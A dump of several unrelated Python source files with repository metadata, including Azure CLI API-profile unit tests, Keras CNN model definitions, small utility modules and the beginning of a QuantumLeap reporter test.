ec4199d622b17f3a0360ce89a478354d85c58add | 163 | py | Python | plpred/models/__init__.py | mandimunari/-plpred | 15891da492ea7337d9113d499ffa518b147c7354 | [
"MIT"
] | null | null | null | plpred/models/__init__.py | mandimunari/-plpred | 15891da492ea7337d9113d499ffa518b147c7354 | [
"MIT"
] | null | null | null | plpred/models/__init__.py | mandimunari/-plpred | 15891da492ea7337d9113d499ffa518b147c7354 | [
"MIT"
] | null | null | null | from .plpred_rf import PlpredRF
from .plpred_gb import PlpredGB
from .plpred_nn import PlpredNN
from .plpred_svm import PlpredSVM
from .base_model import BaseModel | 32.6 | 33 | 0.852761 | 25 | 163 | 5.36 | 0.56 | 0.298507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116564 | 163 | 5 | 34 | 32.6 | 0.930556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6ba2ee41e980307b41e9d8a09be94d198c71f09a | 8,606 | py | Python | src/azure-cli-core/azure/cli/core/tests/test_api_profiles.py | v-Ajnava/azure-cli | febec631d79bfca151e84267b5b409594bad598e | [
"MIT"
] | null | null | null | src/azure-cli-core/azure/cli/core/tests/test_api_profiles.py | v-Ajnava/azure-cli | febec631d79bfca151e84267b5b409594bad598e | [
"MIT"
] | 3 | 2021-03-26T00:48:20.000Z | 2022-03-29T22:05:39.000Z | src/azure-cli-core/azure/cli/core/tests/test_api_profiles.py | v-Ajnava/azure-cli | febec631d79bfca151e84267b5b409594bad598e | [
"MIT"
] | 1 | 2017-12-28T04:51:44.000Z | 2017-12-28T04:51:44.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
import mock
from azure.cli.core.profiles import (get_api_version,
supported_api_version,
PROFILE_TYPE,
ResourceType)
from azure.cli.core.profiles._shared import APIVersionException
from azure.cli.core.cloud import Cloud
class TestAPIProfiles(unittest.TestCase):
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version(self):
# Can get correct resource type API version
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertEqual(get_api_version(ResourceType.MGMT_STORAGE), '2020-10-10')
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version_invalid_rt(self):
# Resource Type not in profile
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(ResourceType.MGMT_COMPUTE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='not-a-real-profile'))
def test_get_api_version_invalid_active_profile(self):
# The active profile is not in our profile dict
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(ResourceType.MGMT_STORAGE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='not-a-real-profile'))
def test_supported_api_version_invalid_profile_name(self):
# Invalid name for the profile name
with self.assertRaises(ValueError):
supported_api_version(PROFILE_TYPE, min_api='2000-01-01')
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_get_api_version_invalid_rt_2(self):
# None is not a valid resource type
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
get_api_version(None)
def test_supported_api_profile_no_constraints(self):
# At least a min or max version must be specified
with self.assertRaises(ValueError):
supported_api_version(PROFILE_TYPE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_min_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile-preview'))
def test_supported_api_profile_min_constraint_not_supported(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, min_api='2000-01-02'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_min_max_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE,
min_api='2000-01-01',
max_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_max_constraint_not_supported(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, max_api='1999-12-30'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile'))
def test_supported_api_profile_preview_constraint(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01-preview'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2000-01-01-profile-preview'))
def test_supported_api_profile_preview_constraint_in_profile(self):
self.assertFalse(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='latest'))
def test_supported_api_profile_latest(self):
self.assertTrue(supported_api_version(PROFILE_TYPE, min_api='2000-01-01'))
def test_supported_api_version_no_constraints(self):
# At least a min or max version must be specified
with self.assertRaises(ValueError):
supported_api_version(ResourceType.MGMT_STORAGE)
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2000-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_max_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, max_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_max_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE,
min_api='2020-01-01',
max_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_max_constraint_not_supported(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertFalse(supported_api_version(ResourceType.MGMT_STORAGE, max_api='2019-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_min_constraint_not_supported(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertFalse(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2021-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_preview_constraint(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10-preview'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2020-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_invalid_rt_for_profile(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2020-01-01')
if __name__ == '__main__':
unittest.main()
| 59.763889 | 106 | 0.691843 | 1,102 | 8,606 | 5.133394 | 0.087114 | 0.029698 | 0.070002 | 0.090154 | 0.896765 | 0.856461 | 0.848683 | 0.834541 | 0.83295 | 0.825703 | 0 | 0.06224 | 0.161748 | 8,606 | 143 | 107 | 60.181818 | 0.72193 | 0.071694 | 0 | 0.457143 | 0 | 0 | 0.267018 | 0.144541 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.047619 | 0 | 0.257143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4042628cd1f1bdafc00b66126eccbcea3930690 | 127 | py | Python | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | n = int(input("Number: "))
if n > 0:
print("it's positive")
elif n < 0:
print("it's negative")
else:
print("it's zero") | 15.875 | 26 | 0.574803 | 23 | 127 | 3.173913 | 0.608696 | 0.287671 | 0.328767 | 0.246575 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.204724 | 127 | 8 | 27 | 15.875 | 0.70297 | 0 | 0 | 0 | 0 | 0 | 0.335938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d44f0647dc318829b504034dbaaf0ffb866074c3 | 29 | py | Python | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | from grid.server import grid
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e8a61d8cfdbdbeff919be4a0c8aed855be91a70 | 6,334 | py | Python | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | from __future__ import print_function
from keras.utils.data_utils import get_file
from keras.optimizers import Adam
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D,AveragePooling2D
from keras.layers import Input
from keras import backend as K
from keras.utils.conv_utils import convert_kernel
import tensorflow as tf
import warnings
from keras.utils.layer_utils import convert_all_kernels_in_model
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
def VGG16():
model = Sequential()
# 1
model.add(Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# 4
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool'))
# Block 5
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool'))
# #Load Weights
# print('K.image_dim_ordering:', K.image_dim_ordering())
# if K.image_dim_ordering() == 'th':
# weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
# TH_WEIGHTS_PATH_NO_TOP,
# cache_subdir='models')
# model.load_weights(weights_path)
# if K.backend() == 'tensorflow':
# warnings.warn('You are using the TensorFlow backend, yet you '
# 'are using the Theano '
# 'image dimension ordering convention '
# '(`image_dim_ordering="th"`). '
# 'For best performance, set '
# '`image_dim_ordering="tf"` in '
# 'your Keras config '
# 'at ~/.keras/keras.json.')
# convert_all_kernels_in_model(model)
# else:
# weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
# TF_WEIGHTS_PATH_NO_TOP,
# cache_subdir='models')
# model.load_weights(weights_path)
# if K.backend() == 'theano':
# convert_all_kernels_in_model(model)
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(1024, activation='relu', name='fc1'))
model.add(Dense(1024, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
def AntonioMax():
model = Sequential()
# 1
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(512, activation='relu', name='fc1'))
model.add(Dense(512, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
def AntonioAvg():
model = Sequential()
# 1
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(512, activation='relu', name='fc1'))
model.add(Dense(512, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
| 50.269841 | 148 | 0.64288 | 858 | 6,334 | 4.59324 | 0.142191 | 0.097437 | 0.08881 | 0.101497 | 0.821365 | 0.81426 | 0.786602 | 0.775945 | 0.77493 | 0.739406 | 0 | 0.064224 | 0.181402 | 6,334 | 125 | 149 | 50.672 | 0.695853 | 0.199242 | 0 | 0.5 | 0 | 0.027027 | 0.200119 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040541 | false | 0 | 0.162162 | 0 | 0.243243 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cf14c8fef4a426a1b42137418c7ef90411cd1bff | 65 | py | Python | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 1 | 2020-08-05T20:30:35.000Z | 2020-08-05T20:30:35.000Z | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 2 | 2020-02-09T22:23:13.000Z | 2020-03-04T22:38:31.000Z | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 2 | 2020-02-18T12:33:32.000Z | 2020-04-08T02:00:34.000Z | from . import sc_tools as sat
# from . import sc_utilities as ut
| 21.666667 | 34 | 0.753846 | 12 | 65 | 3.916667 | 0.666667 | 0.425532 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 65 | 2 | 35 | 32.5 | 0.903846 | 0.492308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cf2b9ff2537ab5c15cea1a0cd9d033cc597a5303 | 75 | py | Python | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | """PlasmaPy tests and test helpers."""
from plasmapy.tests import helpers
| 18.75 | 38 | 0.76 | 10 | 75 | 5.7 | 0.7 | 0.45614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 75 | 3 | 39 | 25 | 0.876923 | 0.426667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf2dcb9f9599c16154cc900ca1ddda0b3dc1f96b | 90 | py | Python | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | x=1
x<<2
print(x)
print(x | 2)
print(x & 1)
y = 0b1000
print(y)
y=y>>3
#Y=0b0001
print(y)
| 8.181818 | 12 | 0.588889 | 23 | 90 | 2.304348 | 0.347826 | 0.339623 | 0.264151 | 0.301887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202703 | 0.177778 | 90 | 10 | 13 | 9 | 0.513514 | 0.088889 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.555556 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
cf380521ea764584994064ecb5df887de71dabe8 | 135 | py | Python | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 365 | 2019-05-21T05:50:30.000Z | 2022-03-29T11:35:35.000Z | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 78 | 2019-11-16T12:22:54.000Z | 2022-03-14T12:21:30.000Z | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 26 | 2019-12-16T06:34:12.000Z | 2022-02-28T07:16:41.000Z | # -*- coding: utf-8 -*-
from benedict.core.move import move
def rename(d, key, key_new):
move(d, key, key_new, overwrite=False)
| 16.875 | 42 | 0.659259 | 22 | 135 | 3.954545 | 0.681818 | 0.091954 | 0.16092 | 0.229885 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.177778 | 135 | 7 | 43 | 19.285714 | 0.774775 | 0.155556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf45fe5edb31bfb360a64fa58a217cd125ce1f02 | 100 | py | Python | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | """
atpthings
=========
ATP Things python package
"""
from . import example123
from . import util
| 10 | 25 | 0.65 | 11 | 100 | 5.909091 | 0.818182 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 0.18 | 100 | 9 | 26 | 11.111111 | 0.756098 | 0.46 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf6747b89b78d13d1eb6418313ed7c8ea75e3484 | 150 | py | Python | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | from .core import start_validators, stop_validators
from .validation_process import validation_process
from .process_logger import get_process_logger
| 37.5 | 51 | 0.886667 | 20 | 150 | 6.3 | 0.5 | 0.269841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086667 | 150 | 3 | 52 | 50 | 0.919708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2b09c15c7c85566a726ac9fd465dab19fcc3e3fc | 16,296 | py | Python | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | from conftest import QL_URL, crate_translator as translator
from reporter.tests.utils import insert_test_data
from datetime import datetime
import pytest
import requests
attr_name = 'temperature'
entity_type = "Room"
entity_id = "Room1"
entity_id_1 = "Room2"
n_days = 4
def query_url(values=False):
url = "{qlUrl}/attrs/{attrName}"
if values:
url += '/value'
return url.format(
qlUrl=QL_URL,
attrName=attr_name
)
@pytest.fixture()
def reporter_dataset(translator):
insert_test_data(translator, [entity_type], n_entities=1, index_size=4, entity_id=entity_id)
insert_test_data(translator, [entity_type], n_entities=1, index_size=4, entity_id=entity_id_1)
yield
def test_NTNE1A_defaults(reporter_dataset):
r = requests.get(query_url())
# Assert Results
assert r.status_code == 200, r.text
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
